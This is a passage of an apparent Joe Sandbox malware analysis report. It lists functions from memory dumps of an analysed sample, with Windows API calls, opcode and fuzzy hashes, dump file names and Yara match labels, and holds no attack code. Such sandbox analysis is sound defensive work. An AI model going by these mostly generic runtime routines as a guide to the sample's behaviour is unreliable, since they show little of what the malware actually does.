                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2cafc3a1602f8d9229f906c35996b6c9b05da501d658cf9aad334e3cb015b51d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ec60a9e03f1742031b91b3dbd8c42c4b5d747c82b6bda5263cb6b490662b12e2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cafc3a1602f8d9229f906c35996b6c9b05da501d658cf9aad334e3cb015b51d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05021D71E042199BDF14CFA9D88069DBBF1FF48324F25826AD919EB385D731EA41CB90
                                                                                                                                                                                                                                                                                                                              Function 1001B584 Relevance: 2.8, APIs: 1, Instructions: 1340COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4168288129-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b19605d9ec4efeff847f8fcaed604f976ab280517c4d712cab60d63496a3c192
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c8b5a874e3698bc855c7ecc7d7ade8d6710a5506dc5cf5191add4587ac67ce70
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b19605d9ec4efeff847f8fcaed604f976ab280517c4d712cab60d63496a3c192
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFC21771E086298BDB65CE289D80BEAB7F5EB44354F1541EAD84DEB240E774EEC18F40
                                                                                                                                                                                                                                                                                                                              Function 004520E2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520DD,?,?,00000008,?,?,00455422,00000000), ref: 0045230F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 977e517564c3c3d0049d1222f3e9a6889a5c410b4df8a0f985261284c0187219
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2B18E311106088FD715CF28C586B567BE0FF06325F25869AEC99CF2A2C379E986CB44
                                                                                                                                                                                                                                                                                                                              Function 0283B5C1 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0283B5BC,?,?,00000008,?,?,0283B25C,00000000), ref: 0283B7EE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4b388d6902ba5cf1105b10333ceed63cd2377186aa7d47c75764b2c58b43f413
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 185cc88669cb3e0bfc562803d5c323c8ecd91b2e43405aab1d8a7dafaf3e2f36
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b388d6902ba5cf1105b10333ceed63cd2377186aa7d47c75764b2c58b43f413
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB16179610609DFD71ACF28C486B647BE0FF4536CF258658E899CF2A2C335D992CB80
                                                                                                                                                                                                                                                                                                                              Function 1001F57B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 1001F7A8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8762ca2d7ef4da5cf78afc794c022220983d73ab53aa29a4ea210c570b17f053
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 799db11da19a00a299c596f45e9540d16fe06c3eef0f65c7fd5f4387e91a96c8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8762ca2d7ef4da5cf78afc794c022220983d73ab53aa29a4ea210c570b17f053
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FB148316106099FD755CF28C486B697BE0FF553A4F25869CE8DACF2A2C735E982CB40
                                                                                                                                                                                                                                                                                                                              Function 00432A59 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7b48c7cdb8adeeef677579d9f9868b7c31ff68b1fdc55a4cfb84755b90803176
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F02B3727083014BD714DF29D95272EF3E2BFCC718F19592EF4859B381DA78A9058B86
                                                                                                                                                                                                                                                                                                                              Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                                                                                                                                                                                                                              Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                                                                                                                                                                                                                              Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                                                                                                                                                                                                                              Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                                                                                                                                                                                                                                              Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                                                                                                                                                                                                                                              Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
